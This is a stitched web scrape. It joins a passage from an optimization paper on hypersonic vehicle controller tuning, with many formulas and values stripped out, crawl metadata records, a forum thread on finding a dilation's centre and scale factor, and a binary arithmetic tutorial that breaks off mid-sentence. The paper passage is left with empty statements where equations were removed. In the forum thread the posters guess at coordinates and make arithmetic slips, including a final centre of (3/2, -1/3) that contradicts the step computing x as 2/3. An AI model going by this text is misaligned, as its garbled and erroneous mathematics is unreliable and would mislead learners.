parameters are the same as AFWA.\n\nThe first function is the Bent Cigar function and is described as follows:where , . The Bent Cigar function is a unimodal function and is smooth. However, it has a narrow ridge. It has the global minimum when , . The second function is the Rosenbrock function that is described as follows:where , . The Rosenbrock function is a nonconvex function in which the global minimum is inside a long, narrow, and parabolic shaped flat valley. It has the global minimum when , . The third function is the Griewank function described as follows:where , . The Griewank function is a multimodal function. It has the global minimum when , . The fourth function is the Alpine function described as follows:where , . The Alpine function is a multimodal function. It has the global minimum when , . The fifth function is the Rastrigin function that is described in where , . The Rastrigin function is a multimodal function, which has huge number of local optima. It has the global minimum when , . The last function is the expanded Schaffer F6 function described in where , . The expanded Schaffer F6 function is a multimodal function. It has the global minimum when , .\n\nThe testing results are given in Table 3.\n\n Function ID Metric GA PSO AFWA Hybrid FWA Mean 63.8216 44.4774 36.6983 Std. 59.7943 40.1607 39.9258 Mean 234.6298 628.8852 58.3773 56.1416 Std. 123.0631 477.8930 31.7385 23.7506 Mean 1.2007 1.7338 0.7527 0.7125 Std. 0.2004 0.5626 0.2188 0.1904 Mean 0.2287 0.6958 0.0708 0.0658 Std. 0.0687 0.4486 0.0259 0.0250 Mean 22.9280 55.2201 19.6178 16.8546 Std. 24.7651 24.7651 15.2610 12.0650 Mean 4.8939 3.7720 3.8627 3.6126 Std. 0.9717 1.2440 1.0428 0.8973\n\nAs shown in Table 3, the proposed hybrid FWA presents the means closest to global minimum. Therefore, the testing results indicate that the hybrid FWA proposed in this study exhibits better search efficiency, when compared to the GA, PSO, and AFWA.\n\n##### 5.2. Algorithm Analysis in Parameter Optimization\n\nIn order to analyze the parameter searching efficiency of algorithms, the GA, PSO, AFWA, and proposed hybrid FWA are used to search for the optimal design parameters of the HOSM controller of HV. In the search, for all the algorithms, the number of individuals is 32, and the number of iterations is 15. For the AFWA, the number of fireworks is 5, the total number of sparks is 32, and the number of mutation sparks is 4. For the hybrid FWA, the number of fireworks and total sparks is the same as in AFWA, , and . The other parameters of algorithms are set the same as shown in Table 2.\n\nThe ranges of the uncertainties in HV are as follows:\n\nThe search space of the HV controller parameters is given in Table 4.\n\n Controller parameters Bound\n\nAs given in Table 1, the cost function in SRA is a weighted sum of 10 probabilities of the design requirements to guide the search of the HOSM controller parameters. The parameters specified for the indicator function are as follows: , , , , , , , , , , , , , , , and . The duration of interested transient stage is defined by the parameters and .\n\nThe results of the HV performance optimization using various optimization algorithms are shown in Figure 9. The -axis of the figure shows the number of iterations, and the -axis shows the optimal value of the cost function . The comparative result indicates that the proposed hybrid FWA exhibits better global search ability for the optimal HV control parameters than that of the GA, PSO, and AFWA.\n\n##### 5.3. Results of Optimal HOSM Controller Design\n\nWith the proposed hybrid FWA-based parameter optimization method, we shall examine the performance of the optimal HOSM controller in the trajectory tracking of HV. Initially, the cruising flight conditions are as follows: Mach number ,  ft/s,  ft, , and  deg/s. At the cruising flight conditions, the aerodynamic parameters , , , , , and are given as follows:\n\nAfter 15 search iterations by the proposed hybrid FWA-based parameter optimization algorithm, the optimal quasi-continuous HOSM controller parameters are determined as follows: . Using AFWA, the optimal controller parameters are determined as follows: . For comparison purposes, the other two sets of design parameters are given: The quasi-continuous HOSM controller parameters (not optimized) in are as follows: . The HOSM controller parameters determined by the improved PSO in are as follows: , .\n\nIn order to demonstrate the tracking performance of HV under uncertainties, the command tracking trajectories using four sets of controller parameters are given in Figure 10. In the simulation, the reference command is generated to control the HV to climb 800 ft at constant velocity in about 15 s. The parametric uncertainties are set as follows: , , , , , and , which are within the range given in (35).\n\nIn Figure 10, the trajectories of altitude , velocity , angle of attack , and throttle setting are depicted by the solid lines, and the reference command is shown by the dotted line. The simulation results demonstrate that the optimal controller parameters determined by hybrid FWA provide a stable and high-accuracy tracking of the reference command in the presence of uncertainties. The command tracking error of the HV control system using the parameters remains the smallest, when compared to the controller parameters , , and . Besides, a faster dynamic response as well as lower fuel consumption is achieved using the parameters determined by the proposed hybrid FWA.\n\nNext, with randomly generated uncertainties, the command tracking trajectories using four sets of controller parameters are demonstrated in Figure 11. The uncertain parameters are assumed to be uniformly distributed within the bounds given in (35). The results indicate that the optimal controller parameters determined by the proposed hybrid FWA not only guarantee the HV system stability, but also exhibit a better tracking performance under bounded uncertainties.\n\nTherefore, the simulation results demonstrate that the HV controller designed by the proposed hybrid FWA-based parameter optimization method achieves an excellent tracking performance in the presence of uncertainties.\n\n#### 6. Conclusion\n\nIn this study, we propose an improved hybrid FWA-based parameter optimization method for nonlinear HV control under uncertainties. An approach of searching for the optimal design parameters is developed by using two processes. The first process involves modeling the relation between the design parameters and the cost function that evaluates the likelihood of system instability and design requirement violation by using SRA. Subsequently, the cost function is minimized by the improved hybrid FWA to achieve a satisfactory tracking performance for the HV system with uncertainties. The proposed method makes it easier and more efficient to solve the optimization problem of satisfying all the HV design requirements with high probability. When compared with other algorithms, the hybrid FWA exhibits better efficiency in solving the HV parameter optimization problem with respect to uncertainties. Moreover, it is also efficient in solving other complex optimization problems.\n\n#### Conflicts of Interest\n\nThe authors declare that there are no conflicts of interest regarding the publication of this paper.\n\n#### Acknowledgments\n\nThis work was supported in part by the National Nature Science Foundation of China (Grant nos. 61573161 and 61473124).\n\n1. B. Xu, D. Wang, Y. Zhang, and Z. Shi, “DOB based neural control of flexible hypersonic flight vehicle considering wind effects,” IEEE Transactions on Industrial Electronics, vol. PP, no. 99, p. 1, 2017. View at: Publisher Site | Google Scholar\n2. Y. Chang, T. Jiang, and Z. Pu, “Adaptive control of hypersonic vehicles based on characteristic models with fuzzy neural network estimators,” Aerospace Science and Technology, vol. 68, pp. 475–485, 2017. View at: Publisher Site | Google Scholar\n3. J. Wang, Y. Wu, and X. Dong, “Recursive terminal sliding mode control for hypersonic flight vehicle with sliding mode disturbance observer,” Nonlinear Dynamics, vol. 81, no. 3, pp. 1489–1510, 2015. View at: Publisher Site | Google Scholar\n4. H. An, C. Wang, and B. Fidan, “Sliding mode disturbance observer-enhanced adaptive control for the air-breathing hypersonic flight vehicle,” Acta Astronautica, vol. 139, pp. 111–121, 2017. View at: Publisher Site | Google Scholar\n5. Y.-J. Wu, J.-X. Zuo, and L.-H. Sun, “Adaptive terminal sliding mode control for hypersonic flight vehicles with strictly lower convex function based nonlinear disturbance observer,” ISA Transactions®, 2017. View at: Publisher Site | Google Scholar\n6. A. Levant, “Quasi-continuous high-order sliding-mode controllers,” Institute of Electrical and Electronics Engineers Transactions on Automatic Control, vol. 50, no. 11, pp. 1812–1816, 2005. View at: Publisher Site | Google Scholar | MathSciNet\n7. M. Sagliano, E. Mooij, and S. Theil, “Adaptive disturbance-based high-order sliding-mode control for hypersonic-entry vehicles,” Journal of Guidance, Control, and Dynamics, vol. 40, no. 3, pp. 521–536, 2017. View at: Publisher Site | Google Scholar\n8. Y. Zhang, R. Li, T. Xue, Z. Liu, and Z. Yao, “An analysis of the stability and chattering reduction of high-order sliding mode tracking control for a hypersonic vehicle,” Information Sciences, vol. 348, pp. 25–48, 2016. View at: Publisher Site | Google Scholar | MathSciNet\n9. R. F. Stengel and L. R. Ray, “Stochastic robustness of linear time-invariant control systems,” Institute of Electrical and Electronics Engineers Transactions on Automatic Control, vol. 36, no. 1, pp. 82–87, 1991. View at: Publisher Site | Google Scholar | MathSciNet\n10. Q. Wang and R. F. Stengel, “Robust nonlinear control of a hypersonic aircraft,” Journal of Guidance, Control, and Dynamics, vol. 23, no. 4, pp. 577–585, 2000. View at: Publisher Site | Google Scholar\n11. L. Cao, D. Zhang, S. Tang, and F. Deng, “A practical parameter determination strategy based on improved hybrid PSO algorithm for higher-order sliding mode control of air-breathing hypersonic vehicles,” Aerospace Science and Technology, vol. 59, pp. 1–10, 2016. View at: Publisher Site | Google Scholar\n12. Q. Wang and R. Stengel, “Robust nonlinear control of a hypersonic aircraft,” in Proceedings of the Guidance, Navigation, and Control Conference and Exhibit, American Institute of Aeronautics and Astronautics, Portland, OR, USA, 1999. View at: Publisher Site | Google Scholar\n13. Q. Wang and R. F. Stengel, “Robust nonlinear flight control of a high-performance aircraft,” IEEE Transactions on Control Systems Technology, vol. 13, no. 1, pp. 15–26, 2005. View at: Publisher Site | Google Scholar\n14. A. Azizi, “Introducing a novel hybrid artificial intelligence algorithm to optimize network of industrial applications in modern manufacturing,” Complexity, vol. 2017, Article ID 8728209, 2017. View at: Publisher Site | Google Scholar\n15. Y. Li, Y. Wu, and X. Qu, “Chicken Swarm-Based Method for Ascent Trajectory Optimization of Hypersonic Vehicles,” Journal of Aerospace Engineering, vol. 30, no. 5, Article ID 04017043, 2017. View at: Publisher Site | Google Scholar\n16. D. E. Goldberg, “Genetic algorithms in search, optimization, and machine learning,” Choice Reviews Online, vol. 27, no. 02, pp. 27-0936–27-0936, 1989. View at: Publisher Site | Google Scholar\n17. A. Taieb, M. Soltani, and A. Chaari, “Parameter Optimization of MIMO Fuzzy Optimal Model Predictive Control By APSO,” Complexity, vol. 2017, Article ID 5813192, 11 pages, 2017. View at: Publisher Site | Google Scholar | MathSciNet\n18. Y. Tan and Y. Zhu, “Fireworks algorithm for optimization,” in Advances in Swarm Intelligence: First International Conference, ICSI 2010, Beijing, China, June 12–15, 2010, Proceedings, Part I, vol. 6145 of Lecture Notes in Computer Science, pp. 355–364, Springer, Berlin, Germany, 2010. View at: Publisher Site | Google Scholar\n19. S. Bureerat, “Hybrid population-based incremental learning using real codes in,” in Proceedings of the 5th international conference on Learning and Intelligent Optimization, pp. 379–391, Springer-Verlag, Rome, Italy, 2011. View at: Google Scholar\n20. J. Li, S. Zheng, and Y. Tan, “Adaptive fireworks algorithm,” in Proceedings of the 2014 IEEE Congress on Evolutionary Computation, CEC 2014, pp. 3214–3221, China, July 2014. View at: Publisher Site | Google Scholar\n21. Y.-J. Zheng, X.-L. Xu, H.-F. Ling, and S.-Y. Chen, “A hybrid fireworks optimization method with differential evolution operators,” Neurocomputing, vol. 148, pp. 75–82, 2015. View at: Publisher Site | Google Scholar\n22. B. Zhang, Y.-J. Zheng, M.-X. Zhang, and S.-Y. Chen, “Fireworks Algorithm with Enhanced Fireworks Interaction,” IEEE Transactions on Computational Biology and Bioinformatics, vol. 14, no. 1, pp. 42–55, 2017. View at: Publisher Site | Google Scholar\n23. J. Li, S. Zheng, and Y. Tan, “The Effect of Information Utilization: Introducing a Novel Guiding Spark in the Fireworks Algorithm,” IEEE Transactions on Evolutionary Computation, vol. 21, no. 1, pp. 153–166, 2017. View at: Publisher Site | Google Scholar\n24. J. T. Parker, A. Serrani, S. Yurkovich, M. A. Bolender, and D. B. Doman, “Control-oriented modeling of an air-breathing hypersonic vehicle,” Journal of Guidance, Control, and Dynamics, vol. 30, no. 3, pp. 856–869, 2007. View at: Publisher Site | Google Scholar\n25. J. J. Liang, B. Y. Qu, and P. N. Suganthan, Problem definitions and evaluation criteria for the CEC 2014 special session and competition on single objective real-parameter numerical optimization, 2013." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8770166,"math_prob":0.8471882,"size":41927,"snap":"2022-05-2022-21","text_gpt3_token_len":8419,"char_repetition_ratio":0.16117644,"word_repetition_ratio":0.122432984,"special_character_ratio":0.20177928,"punctuation_ratio":0.14441015,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96881306,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-21T07:16:53Z\",\"WARC-Record-ID\":\"<urn:uuid:3d9eb7ab-9e64-44e3-9fe9-cc779f5841a7>\",\"Content-Length\":\"1049303\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eeb13c9b-a692-4da7-87e5-ec16f0ba41d9>\",\"WARC-Concurrent-To\":\"<urn:uuid:7078cc38-1835-4255-93ae-c8189440c93f>\",\"WARC-IP-Address\":\"18.67.65.114\",\"WARC-Target-URI\":\"https://www.hindawi.com/journals/complexity/2018/9098151/\",\"WARC-Payload-Digest\":\"sha1:7WIVDG4GBI6CV67DIVVLT4JI2GRQKGS6\",\"WARC-Block-Digest\":\"sha1:4EVAFBCFYXPEXYHIOORYUUOFNAVHWUBW\",\"WARC-Truncated\":\"length\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662538646.33_warc_CC-MAIN-20220521045616-20220521075616-00317.warc.gz\"}"}
https://questioncove.com/updates/4dfa1cca0b8b370c28be3bdc
[ "Mathematics", null, "OpenStudy (anonymous):\n\nMy problem is attached, Thanks!", null, "OpenStudy (anonymous):\n\nHere,", null, "OpenStudy (anonymous):\n\ntwo triangles ABC and abc I think Aa and Bb and Cc lines converge in center of dilation", null, "OpenStudy (anonymous):\n\nratio is ab/AB =ac/AC =bc/BC", null, "OpenStudy (anonymous):\n\nThanks, what does it mean by scale the factor of the dilation?", null, "OpenStudy (anonymous):\n\nA scale factor is a number which scales, or multiplies, some quantity. In the equation y=Cx, C is the scale factor for x. C is also the coefficient of x, and may be called the constant of proportionality of y to x. For example, doubling distances corresponds to a scale factor of 2 for distance, while cutting a cake in half results in pieces with a scale factor of ½.", null, "OpenStudy (anonymous):\n\nokay, and did you find the center?", null, "OpenStudy (anonymous):\n\nlet me see again the diagram plz", null, "OpenStudy (anonymous):\n\nIts at the top.", null, "OpenStudy (anonymous):\n\nplease chek my nums: A(-6,0) ,a(-2,0) B(6,-6) , b(2,-2) Aa: y=0", null, "OpenStudy (anonymous):\n\nBb: m=-1 y+2=-1(x-2) y=-x-4", null, "OpenStudy (anonymous):\n\nthey are correct", null, "OpenStudy (anonymous):\n\n-x-4=0: x=-4 (-4,0) it,s not true!", null, "OpenStudy (anonymous):\n\nis it?", null, "OpenStudy (anonymous):\n\nhhmm... not too sure either", null, "OpenStudy (anonymous):\n\nmy x component is wrong. why?", null, "OpenStudy (anonymous):\n\nI don't know what to tell ya. You were on a roll!", null, "OpenStudy (anonymous):\n\ny=-x-4 is false! y=-x. do you agree?", null, "OpenStudy (anonymous):\n\nso -x=0 x=0 (0,0)", null, "OpenStudy (anonymous):\n\nI can't tell you I agree. This is a problem from way back, and I've forgotten all of the mechanics. I think your on to something though. Or at least I hope... lol", null, "OpenStudy (anonymous):\n\nI hve forgotten too :)", null, "OpenStudy (anonymous):\n\nhaha! Thanks for trying though!", null, "OpenStudy (anonymous):\n\nsorry if i could not help u:)", null, "OpenStudy (anonymous):\n\nNo problem, I'll try re-posting later!", null, "OpenStudy (radar):\n\nThe problem i have is with the drawing. You have to guess the locations as the points are not expressed like (x,y)", null, "OpenStudy (anonymous):\n\nya that sucks", null, "OpenStudy (radar):\n\nlike the two lines that converge on the negative x axis a guess would be -6 but that would be just a guess.", null, "OpenStudy (radar):\n\nThe vertical line that is the base of the large triangle looks to have a segment of the line x=6, but I am not sure.", null, "OpenStudy (anonymous):\n\nI think 6 is the point for both of those.", null, "OpenStudy (radar):\n\nYou would think they would of stated it so, rather than leave a student guessing. The diagram appears to me that the triangles are skewed a little bit so that the x axis does not go through the midpoint of the larger triangles base.", null, "OpenStudy (anonymous):", null, "OpenStudy (radar):\n\nSorry but that is all I can offer! Like you say maybe a reposting and someone like satellite, amister or polpak will see it.", null, "OpenStudy (anonymous):\n\nThanks! I will try that.", null, "OpenStudy (amistre64):\n\nthis one eh?", null, "OpenStudy (anonymous):\n\nyes!!!", null, "OpenStudy (amistre64):\n\ndo we have any option to choose from? as in multiple choices?", null, "OpenStudy (anonymous):\n\nSadly no, I have show my work.", null, "OpenStudy (amistre64):\n\nthis is what I assume the points to be", null, "OpenStudy (anonymous):\n\nlooks good", null, "OpenStudy (amistre64):\n\nid have to look up what 'scale dilution' means, but I think its just the scaled factor; find the distances of each line segment", null, "OpenStudy (amistre64):\n\n12 4 --- as --- ; is a scale of 1:3 if i see it right 3 1", null, "OpenStudy (amistre64):\n\nbut the dilution is not centered to the bigger tri, so let me look into that", null, "OpenStudy (amistre64):\n\nscale is either 1:3 or 3:1 that i see, does that make sense? the center of the dilution is the points where the lines cross from angle to midsection ..", null, "OpenStudy (anonymous):\n\nDo you think I would need to park the spot like with the paint tool?", null, "OpenStudy (amistre64):", null, "OpenStudy (amistre64):\n\ndetermine the equations of 2 of those lines; and see where they match up", null, "OpenStudy (amistre64):\n\n(-2,0) (2, -1/2) is one line (2,1) (0,1) appears to be the other", null, "OpenStudy (amistre64):\n\nslope = -1/8 y-0 = -1/8(x-(-2)) y = (-1/8)x - (1/4)", null, "OpenStudy (amistre64):\n\n(2,1) -(0,-1) ------ 2,2 ; slope = y/x = 1 y-1 = x -2 y = x-1 is the other equation", null, "OpenStudy (amistre64):\n\nwhen: x-1 = (-1/8)x - (1/4) we have the center of the diulted triangle right?", null, "OpenStudy (amistre64):\n\nx + (1/8)x = (-1/4) +1 9/8 x = 3/4 x = 8(3)/9(4) = 2(1)/3(1) = 3/2 y = (2/3) -1 = 2/3 - 3/3 = -1/3 the center appears to be at: $(\\frac{3}{2},-\\frac{1}{3})$", null, "OpenStudy (anonymous):\n\nWow. First off my apologies, secondly a huge round of plausible! Thank you so much, I had no idea. One little question before you go: How do you find the area of a circle in pi when your given the entire diameter?", null, "OpenStudy (amistre64):\n\nArea and Circumference have a radius in common; and Radius = half the diameter", null, "OpenStudy (anonymous):\n\napplause*", null, "OpenStudy (amistre64):\n\nArea = pi r^2", null, "OpenStudy (amistre64):\n\nwas my diluted tri correct? :)", null, "OpenStudy (anonymous):\n\nI'm not really sure! But again, so i divide the diameter in half, and then what?", null, "OpenStudy (amistre64):\n\n(d/2)^2 * pi", null, "OpenStudy (amistre64):\n\nif diam = 10; then Area = (10/2)^2 pi = 25 pi", null, "OpenStudy (anonymous):\n\nGot it! thank you so, so, so much!", null, "OpenStudy (radar):\n\nThanks amistre64, I was lost without the points be given.", null, "OpenStudy (amistre64):\n\n:) i had to assume points as well\n\nLatest Questions", null, "Jasonisyours: What's a good book recommendation to read.\n5 minutes ago 2 Replies 1 Medal", null, "miguel008: kendrick\n1 hour ago 9 Replies 0 Medals", null, "23biheil: Use the four functions below for this question: f(x) g(x) h(x) j(x) x f(x) u22121 u22127 1 1 2 5 a line going through the point, negative 2, 5, and 0, negat\n2 hours ago 0 Replies 0 Medals", null, "Jane2711: What do u guys think of my edit (The Bakusquad)\n3 hours ago 3 Replies 0 Medals", null, "iosangel: What figure of speech is being used here. Trust thyself; every heart vibrates to that iron string.\n3 hours ago 6 Replies 1 Medal", null, "Rylee88: I don't get what this exactly means.\n4 hours ago 10 Replies 0 Medals", null, "SallyUwU: Mha Rate 1/10\n4 hours ago 4 Replies 0 Medals", null, "hannahj: Which of the following is the complete list of roots for the polynomial function f (x) = (x squared + 6 x + 8) (x squared + 6 x + 13)? 1.\n5 hours ago 1 Reply 0 Medals", null, "montes67: I need a scenario where all of Earth's spheres (bio, geo, atmos, hydro, magneto) interact with one another.\n4 hours ago 2 Replies 0 Medals", null, "Mochi: How can including community service into college course curriculum change the way students learn? Answer in a one sentence thesis statement.\n4 hours ago 10 Replies 2 Medals" ]
[ null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/assets/users/jasonisyours/avatar/small", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/assets/users/jane2711/avatar/small", null, "https://questioncove.com/assets/users/iosangel/avatar/small", null, "https://questioncove.com/assets/users/rylee88/avatar/small", null, "https://questioncove.com/assets/users/sallyuwu/avatar/small", null, "https://questioncove.com/images/default-avatar.svg", null, "https://questioncove.com/assets/users/montes67/avatar/small", null, "https://questioncove.com/assets/users/mochi/avatar/small", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94945383,"math_prob":0.74556065,"size":3949,"snap":"2021-31-2021-39","text_gpt3_token_len":1186,"char_repetition_ratio":0.102915086,"word_repetition_ratio":0.0,"special_character_ratio":0.31476322,"punctuation_ratio":0.1322314,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9869987,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-22T04:31:29Z\",\"WARC-Record-ID\":\"<urn:uuid:74d80383-4c13-4d04-97b8-3016f64af73e>\",\"Content-Length\":\"62790\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dad471c2-26e0-442b-bffb-95578b8dd760>\",\"WARC-Concurrent-To\":\"<urn:uuid:5dbd4254-bc73-4266-ba84-5661b22880dd>\",\"WARC-IP-Address\":\"192.249.125.12\",\"WARC-Target-URI\":\"https://questioncove.com/updates/4dfa1cca0b8b370c28be3bdc\",\"WARC-Payload-Digest\":\"sha1:SLY3ZNTQ4SVUZKLVY7UVVOQS4L3XSH57\",\"WARC-Block-Digest\":\"sha1:DTGDUB4JLSCOEAYX5GPGRTKM6GCNNQ47\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057329.74_warc_CC-MAIN-20210922041825-20210922071825-00661.warc.gz\"}"}
https://tincantalk.com/Networking_Basics_Binary.html
[ "## Basic Concepts Behind the Binary System\n\nTo understand binary numbers, begin by recalling elementary school math. When we first learned about numbers, we were taught that, in the decimal system, things are organized into columns:\n\n``` H | T | O\n1 | 9 | 3\n```\nsuch that \"H\" is the hundreds column, \"T\" is the tens column, and \"O\" is the ones column. So the number \"193\" is 1-hundreds plus 9-tens plus 3-ones.\n\nYears later, we learned that the ones column meant 10^0, the tens column meant 10^1, the hundreds column 10^2 and so on, such that\n\n``` 10^2|10^1|10^0\n1 | 9 | 3\n```\nthe number 193 is really {(1*10^2)+(9*10^1)+(3*10^0)}.\n\nAs you know, the decimal system uses the digits 0-9 to represent numbers. If we wanted to put a larger number in column 10^n (e.g., 10), we would have to multiply 10*10^n, which would give 10^(n+1), and be carried a column to the left. For example, putting ten in the 10^0 column is impossible, so we put a 1 in the 10^1 column, and a 0 in the 10^0 column, thus using two columns. Twelve would be 12*10^0, or 10^0(10+2), or 10^1+2*10^0, which also uses an additional column to the left (12).\n\nThe binary system works under the exact same principles as the decimal system, only it operates in base 2 rather than base 10. In other words, instead of columns being\n\n```\n10^2|10^1|10^0\n```\nthey are\n``` 2^2|2^1|2^0\n```\n\nInstead of using the digits 0-9, we only use 0-1 (again, if we used anything larger it would be like multiplying 2*2^n and getting 2^n+1, which would not fit in the 2^n column. Therefore, it would shift you one column to the left. For example, \"3\" in binary cannot be put into one column. The first column we fill is the right-most column, which is 2^0, or 1. Since 3>1, we need to use an extra column to the left, and indicate it as \"11\" in binary (1*2^1) + (1*2^0).\n\nRemember:\n``` 2^4| 2^3| 2^2| 2^1| 2^0\n| | | 1 | 0\n| | 1 | 1 | 1\n1 | 0 | 1 | 0 | 1\n1 | 1 | 1 | 1 | 0\n```\n\nConsider the addition of decimal numbers:\n\n``` 23\n+48\n___\n```\n\nWe begin by adding 3+8=11. Since 11 is greater than 10, a one is put into the 10's column (carried), and a 1 is recorded in the one's column of the sum. Next, add {(2+4) +1} (the one is from the carry)=7, which is put in the 10's column of the sum. Thus, the answer is 71.\n\nBinary addition works on the same principle, but the numerals are different. Begin with one-bit binary addition:\n\n``` 0 0 1\n+0 +1 +0\n___ ___ ___\n0 1 1\n```\n\n1+1 carries us into the next column. In decimal form, 1+1=2. In binary, any digit higher than 1 puts us a column to the left (as would 10 in decimal notation). The decimal number \"2\" is written in binary notation as \"10\" (1*2^1)+(0*2^0). Record the 0 in the ones column, and carry the 1 to the twos column to get an answer of \"10.\" In our vertical notation,\n\n``` 1\n+1\n___\n10\n```\n\nThe process is the same for multiple-bit binary numbers:\n\n``` 1010\n+1111\n______\n```\n\n• Step one:\nColumn 2^0: 0+1=1.\nRecord the 1.\nTemporary Result: 1; Carry: 0\n• Step two:\nColumn 2^1: 1+1=10.\nRecord the 0, carry the 1.\nTemporary Result: 01; Carry: 1\n• Step three:\nColumn 2^2: 1+0=1 Add 1 from carry: 1+1=10.\nRecord the 0, carry the 1.\nTemporary Result: 001; Carry: 1\n• Step four:\nColumn 2^3: 1+1=10. Add 1 from carry: 10+1=11.\nRecord the 11.\nFinal result: 11001\n\nAlternately:\n\n``` 11 (carry)\n1010\n+1111\n______\n11001\n```\n\nAlways remember\n\n• 0+0=0\n• 1+0=1\n• 1+1=10\n\n``` 111 101 111\n+110 +111 +111\n______ _____ _____\n```\n\n## Binary Multiplication\n\nMultiplication in the binary system works the same way as in the decimal system:\n\n• 1*1=1\n• 1*0=0\n• 0*1=0\n\n``` 101\n* 11\n____\n101\n1010\n_____\n1111\n```\n\nNote that multiplying by two is extremely easy. To multiply by two, just add a 0 on the end.\n\n## Binary Division\n\nFollow the same rules as in decimal division. For the sake of simplicity, throw away the remainder.\n\nFor Example: 111011/11\n\n```\n10011 r 10\n_______\n11)111011\n-11\n______\n101\n-11\n______\n101\n11\n______\n10\n```\n\n## Decimal to Binary\n\nConverting from decimal to binary notation is slightly more difficult conceptually, but can easily be done once you know how through the use of algorithms. Begin by thinking of a few examples. We can easily see that the number 3= 2+1. and that this is equivalent to (1*2^1)+(1*2^0). This translates into putting a \"1\" in the 2^1 column and a \"1\" in the 2^0 column, to get \"11\". Almost as intuitive is the number 5: it is obviously 4+1, which is the same as saying [(2*2) +1], or 2^2+1. This can also be written as [(1*2^2)+(1*2^0)]. Looking at this in columns,\n\n``` 2^2 | 2^1 | 2^0\n1 0 1\n```\nor 101.\n\nWhat we're doing here is finding the largest power of two within the number (2^2=4 is the largest power of 2 in 5), subtracting that from the number (5-4=1), and finding the largest power of 2 in the remainder (2^0=1 is the largest power of 2 in 1). Then we just put this into columns. This process continues until we have a remainder of 0. Let's take a look at how it works. We know 